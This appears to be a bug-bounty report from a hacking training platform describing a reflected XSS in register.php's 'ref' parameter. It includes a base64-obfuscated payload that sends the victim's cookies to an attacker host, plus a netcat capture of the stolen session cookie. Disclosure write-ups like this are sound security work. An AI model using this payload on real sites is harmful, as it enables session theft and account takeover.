FirstBlood-#116 — Reflective XSS at http://firstbloodhackers.com:49369/register.php
This issue was discovered on FirstBlood v1
On 2021-05-10, 0xconft Level 5 reported:
Hi there,
I found Reflective XSS at http://firstbloodhackers.com:49369/register.php via ref parameter and since firstbloodhackers.com doesn't have httponly flag at cookie header this xss can be used to steal cookie.
PoC alert. You must hover your mouse over the "return to previous page" banner
http://firstbloodhackers.com:49369/register.php?ref=x%27+onmousemove=%27alert(1)%27
When doctor accessing this url while logged in at firstbloodhackers.com and hovering their mouse over the "return to previous page" banner the XSS will be executed and the cookie will be sent to attacker's server
http://firstbloodhackers.com:49369/register.php?ref=x%27+onmousemove=%27eval(atob(`dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCAnaHR0cDovLzE5Mi4xNjguMC4yMDoxMzM3Lz91PScrZG9jdW1lbnQuY29va2llKTt4aHIuc2VuZCgpOw`))%27
The cookie will be sent to attacker's server
$ nc -lvp 1337
Listening on 0.0.0.0 1337
Connection received on 192.168.0.20 56186
GET /?u=drps=3d0582d27073a87a4db320f57;%20doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9 HTTP/1.1
Host: 192.168.0.20:1337
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://firstbloodhackers.com:49369
Connection: close
Referer: http://firstbloodhackers.com:49369/
Best Regards,
0xconft
P3 Medium
Endpoint: /register.php
Parameter: ?ref
Payload: x%27+onmousemove=%27eval(atob(`dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCAnaHR0cDovLzE5Mi4xNjguMC4yMDoxMzM3Lz91PScrZG9jdW1lbnQuY29va2llKTt4aHIuc2VuZCgpOw`))%27
FirstBlood ID: 4
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on register.php. The developer made use of htmlentities but this is inadequate as the HREF is wrapped in single quotes.
Creator & Administrator
Great finding, even though this is a dupe, i'm awarding a bounty at my discretion